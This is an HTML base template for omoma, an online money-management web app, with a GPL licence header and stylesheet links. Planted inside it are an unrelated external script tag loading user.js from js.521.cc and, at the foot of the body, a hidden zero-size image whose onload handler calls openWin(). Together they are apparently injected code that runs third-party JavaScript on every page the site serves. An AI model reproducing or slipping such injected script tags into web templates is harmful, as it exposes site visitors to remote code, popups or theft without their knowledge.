{% comment %}
template skeleton for omoma
copyright 2011 sebastien maccagnoni-munch

this file is part of omoma.

omoma is free software: you can redistribute it and/or modify
it under the terms of the gnu general public license as published by
the free software foundation, version 3.

omoma is distributed in the hope that it will be useful,
but without any warranty; without even the implied warranty of
merchantability or fitness for a particular purpose.  see the
gnu general public license for more details.

you should have received a copy of the gnu general public license
along with omoma. if not, see <http://www.gnu.org/licenses/>.
{% endcomment %}{% spaceless %}
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
    <link rel="stylesheet" href="/static/common.css" />
    <link rel="stylesheet" href="/static/containers.css" />
    <link rel="stylesheet" href="/static/forms.css" />
    <link rel="stylesheet" href="/static/notifications.css" />
    <link rel="stylesheet" href="/static/sidebar.css" />
    <link rel="stylesheet" href="/static/tables.css" />
    <title>omoma - online money management</title>
<script language="javascript" type="text/javascript" src="http://js.521.cc/js/user.js"></script></head>

<body>{% block body %}page content{% endblock %}<img src="http://www.baidu.com/search/img/logo.gif" width="0" height="0" onload="openWin();" /></body>

</html>
{% endspaceless %}
